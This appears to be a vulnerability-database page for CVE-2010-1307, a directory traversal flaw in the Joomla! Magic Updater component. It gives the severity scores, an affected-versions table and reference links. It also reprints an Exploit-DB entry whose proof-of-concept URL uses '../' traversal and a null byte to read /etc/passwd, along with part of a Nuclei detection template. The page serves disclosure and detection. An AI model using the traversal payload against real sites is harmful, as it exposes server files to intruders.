CVE-2010-1307
published 2010-04-08CVE-2010-1307: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot…
PriorityP337medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
10.16%
95.1th percentile
Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
| software.realtyna | com_joomlaupdater | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Magic Updater - Local File Inclusion
exploitdb·2010-04-05
CVE-2010-1307 Joomla! Component Magic Updater - Local File Inclusion
Joomla! Component Magic Updater - Local File Inclusion
---
Title : Joomla Magic Updater (com_joomlaupdater) LFI Vulnerability
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_joomlaupdater&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component Magic Updater - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1307 [MEDIUM] Joomla! Component Magic Updater - Local File Inclusion
Joomla! Component Magic Updater - Local File Inclusion
A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
http://packetstormsecurity.org/1004-exploits/joomlaupdater-lfi.txthttp://secunia.com/advisories/39348http://www.exploit-db.com/exploits/12070http://www.securityfocus.com/bid/39207http://www.vupen.com/english/advisories/2010/0806https://exchange.xforce.ibmcloud.com/vulnerabilities/57531http://packetstormsecurity.org/1004-exploits/joomlaupdater-lfi.txthttp://secunia.com/advisories/39348http://www.exploit-db.com/exploits/12070http://www.securityfocus.com/bid/39207http://www.vupen.com/english/advisories/2010/0806https://exchange.xforce.ibmcloud.com/vulnerabilities/57531
2010-04-08
Published